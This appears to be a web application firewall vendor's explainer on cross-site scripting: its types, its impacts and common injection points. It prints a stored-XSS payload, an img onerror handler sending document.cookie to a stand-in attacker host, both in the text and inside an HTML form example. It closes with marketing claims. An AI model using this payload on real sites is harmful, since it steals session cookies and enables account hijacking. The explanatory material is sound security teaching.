XSS attacks fall into three categories: Persistent/Stored XSS, Reflected XSS and DOM based XSS.
- Persistent/Stored XSS attacks store a malicious script on the web application server. Any user accessing the application becomes vulnerable to having the script execute in their browser.
- DOM-based XSS attacks do not inject new script into a web page; they change the behavior of an existing script. Typically the change is accomplished by changing a script-trusted DOM element.
Client-side scripts have complete access to the DOM and can access or modify any part of it, including session data theft, cookie manipulation or theft, accessing previous browsing history, and so on. For example, an attacker who succeeds in exploiting XSS vulnerabilities can hijack session data of an authenticated user. This allows an attacker to change a user's password, thus gaining access to the victim’s account/system.
Even more crucial, XSS attacks can allow an attacker to control the entire client system. Malicious scripts can silently redirect client browsers to attacker-controlled domains serving malware-like browser exploit kits (like Black Hole). These kits profile the user browsers including type, version plugins, and so on. They then foist a large number of various exploits that target known and unknown vulnerabilities, including those in Adobe, Java, and Microsoft plugins. Exploit kits are often first to incorporate the latest threats that lack vendor patches, and are generally available for a few hundred dollars.
XSS injection is possible through any part of a request that is not properly sanitized before being incorporated into a subsequent response. Typical targets include:
- URL Parameters
- FORM Parameters (GET and POST parameters)
- HTTP Headers
- HTTP Referrer Objects
The attacker has injected the code (
<img+src=ImageNotFound.gif+onerror=window.open('http://attacker_site.com/CaptureCookie.cgi?cookie='+document.cookie)>) in the address field to fetch the session cookie of any victim (user) who tries to view the attacker’s profile.
<title>All Form Fields</title>
<TR> <TD>First Name:</TD> <TD>John</TD></TR>
<TR> <TD>Last Name:</TD> <TD>Peter</TD></TR>
<TR> <TD>Address:</TD> <TD><img src=ImageNotFound.gif onerror=window.open('http://attacker_site.com/CaptureCookie.cgi?cookie='+document.cookie)></TD></TR>
<TR> <TD>Gender:</TD> <TD>Male</TD></TR>
The Barracuda Web Application Firewall immediately remediates XSS attacks. It contains comprehensive rule sets to detect plain or obfuscated XSS attacks in incoming requests. Out-of-the-box, the default security policy defeats all XSS attacks without requiring any additional configuration or changes to web application code. Signatures are automatically updated to cover the latest threats.
OWASP Top 10, PCI-DSS, Client Side Attacks